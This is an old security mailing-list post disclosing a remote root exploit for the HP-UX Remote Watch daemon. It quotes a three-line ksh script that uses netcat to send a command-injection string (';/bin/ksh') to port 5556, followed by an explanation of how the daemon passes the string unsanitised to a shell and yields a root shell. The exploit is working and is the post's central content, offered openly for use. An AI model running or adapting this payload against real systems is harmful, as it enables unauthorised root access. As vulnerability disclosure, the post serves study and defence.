HP/UX Remote Watch (was Re: BoS: SOD remote exploit)

[barnett () GRYMOIRE CRD GE COM (Bruce Barnett)]

There have been questions about this exploit:

==========
#!/bin/ksh
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it.  That's the hole.. Believe it.
==========


This was the first HP "hole of the week", found "courtesy of"

        http://command.com.inter.net/~sod

in late September 1996.

I found the following note along with the exploit:

==========

The Explanation

First, if you're not running with netcat, stop and go out and get it.
You could do this with telnet, and netcat certainly isn't required for
this at all, but it just kicks in general, IMHO.

Now, basically what we're doing is sending a string to the rwdaemon port,
which is usually # 5556.  This could change, but I haven't seen anyone who's
done it yet.  The string has basically three parts, the ' 11' part, the T,
and the ';/bin/ksh' part.  The 11 represents the total string length as sent
to the daemon (minus the first three bytes, of course), sent in ASCII
numeric for some ungodly reason.  The T signals a certain program, in this
case, ummm, getparams, I think.  Now from this point, we can only send a
single argument to the daemon, because it will strip out whitespace-seperated
arguments and only use the first one.  The getparams program gets run under a
shell, so all the shell metacharacters are valid.  The shell gets sent the
command 'getparams -somearg1 -somearg2 ;/bin/ksh -v' (the -v gets stuck as
the last argument).  It'll balk on the getparams, send the error, then drop
you into a root shell.. How thoughtful of it.